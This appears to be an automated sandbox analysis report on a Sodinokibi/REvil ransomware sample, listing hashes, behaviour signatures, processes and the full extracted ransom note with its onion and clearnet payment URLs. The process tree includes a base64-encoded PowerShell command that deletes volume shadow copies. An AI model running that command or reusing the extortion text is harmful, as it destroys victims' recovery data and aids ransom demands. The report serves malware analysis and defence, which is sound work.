Analysis

  • max time kernel
    144s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:47

General

  • Target

    e8c724785ff0233911a56176652a8b4090ea8c99118fd2cc95409cab745747bb.exe

  • Size

    131KB

  • MD5

    eaf6a7625df801454ba48b03f7e6e4b2

  • SHA1

    b7bd42c523f6694c2a8bbdbfc524051a8d7d4a2a

  • SHA256

    e8c724785ff0233911a56176652a8b4090ea8c99118fd2cc95409cab745747bb

  • SHA512

    3d20318d1b1753eb7c3cf802cdd2b172c6a55df6d18e1a63b24ca2cadcce2507c353b397f663099ea4c9ca508579e383051ac5698fab1e08e97969606ba9465c

Score
10/10

Malware Config

Extracted

Path

C:\41522ik48-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. CDHFUND. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 41522ik48. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A89F898DE2F9BB8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/0A89F898DE2F9BB8 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: /elAXs6Jdj9Q0W/S9C+5vtmyXKlvZX83Zo8+jhgWv5N3LiEG4nZchUwd6wwhhyp5 yClJCctdl4fgeRrdifXlQcEwdrLIsjwdYeC9dVmSYxRtMPfJfiiTc3t5Tt7uFzT3 EQFgHV1rQMmAk893LWsMVUlrN/SDN308iS5+TEtNG3kfbOR1/9zEBV2VJRJ+946q bJlDR3LHJWdjMkptRaeAO/U7hwALnL0MMegiuFlwy0IFPu87xR9K0/UF9lPKVkXL 0yUUWlyLCIuRuzsmeSFbqxSHHMIOQjsrlHMOaaD3/LsGmpBzWT3BAaEzj+iZWDLS Tb0bvCjjikgrZp8eqsXME6eT89tQMQGfgve2kHBw1sNTCAJO72OFp/xctVHNu+61 Rdd/baLsOWUU6gCZene+H229cgbhTsSzbLchgXmxvPLMzcGo99klqHcXHZVBHT47 Df34oPfAnxjEO0mk74JVJ6aPi0ZS75Uu+TC/kaC8Wy2g2ZxkMCZPynci9zNQNakG y8ILb/3YIGGkgwLA7qR6rzM04/6AfhItz32QEUeZM+EOypQw5UUXbKeDpreb4Mgg oEEhlmNtJOxRMrV3CUtORU05XFAaVZ3zO3lt+Qj4p1349lrWYOVRoHr2CLRLfIxc UOmODXv9l27I+GEfmWYX9rL5k5Ox0tQ2YrLHllaaOK0XgiuyBM0n7gz+Fz8tBEDH P6iRB6JrH3gEtLLjAfmN3lPDp0VK/N0jqOaRVMRIys82nIHqlnLQLY/+N7TysQ+b Mds50lAy382o6FfSrlOF7B8yKnedqLh1enYsFX7v6no/O4Qd7vbpLnoeW3qbcow6 7KmccS1sBaoMV2QW/H0ZhaxrqrY5xBJK8xJw746drjtqGKdblDZi9bntAEZISEwO C8TuVuEV7CEiiqTzF66AoBewMLAnxdQ8ydhgQcNLSZjSJcfkz9r0ZEFbEwiodJia wMiK4Ri3cKE/xrG3aQg/U9utg4wZqWg8Mt2dwh70e8zWTWQ/EnFstEL6G7kifHra YXX3/dOdbjbfeSzuQ/pCI8cBQ573vKVvabvq310gC2DvniZicNFYCQTd0Q2weHZr 6YRkLSmDgJt70CZWO1AkKUVS8hFiSsm2UMd9YW9tkZkMsVkxk3ERm4rIPFSnCTCW 8W4= Extension name: 41522ik48 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0A89F898DE2F9BB8

http://decryptor.top/0A89F898DE2F9BB8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 7 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e8c724785ff0233911a56176652a8b4090ea8c99118fd2cc95409cab745747bb.exe
    "C:\Users\Admin\AppData\Local\Temp\e8c724785ff0233911a56176652a8b4090ea8c99118fd2cc95409cab745747bb.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3104
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2320
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2500

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/3104-119-0x000001DAAF0D0000-0x000001DAAF0F2000-memory.dmp
      Filesize

      136KB

    • memory/3104-122-0x000001DAAF110000-0x000001DAAF112000-memory.dmp
      Filesize

      8KB

    • memory/3104-123-0x000001DAAF113000-0x000001DAAF115000-memory.dmp
      Filesize

      8KB

    • memory/3104-124-0x000001DAC7830000-0x000001DAC78A6000-memory.dmp
      Filesize

      472KB